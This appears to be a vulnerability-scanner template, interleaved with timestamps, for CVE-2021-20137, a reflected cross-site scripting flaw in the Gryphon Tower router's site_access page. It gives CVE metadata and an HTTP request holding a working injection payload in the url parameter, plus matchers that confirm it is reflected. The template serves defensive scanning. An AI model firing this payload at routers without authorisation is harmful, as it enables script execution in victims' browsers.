2022-06-02 10:25:19 +00:00
id : CVE-2021-20137
info :
2022-09-08 13:28:46 +00:00
name : Gryphon Tower - Cross-Site Scripting
2022-06-02 10:25:19 +00:00
author : edoardottt
severity : medium
2022-09-08 13:28:46 +00:00
description : Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to the latest version to mitigate this vulnerability.
2023-04-12 10:55:48 +00:00
reference :
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137
- https://www.tenable.com/security/research/tra-2021-51
- https://nvd.nist.gov/vuln/detail/CVE-2021-20137
2022-06-02 10:25:19 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-20137
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.3285
epss-percentile : 0.96459
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : gryphonconnect
product : gryphon_tower_firmware
tags : xss,tenable,cve,cve2021,gryphon
2022-06-02 10:25:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-06-02 10:25:19 +00:00
- method : GET
path :
- "{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"
matchers-condition : and
matchers :
- type : word
part : header
words :
- "text/html"
- type : word
part : body
words :
- 'onfocus=alert(document.domain) autofocus=1>'
- 'Send Access Request URL'
2022-09-08 13:28:46 +00:00
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200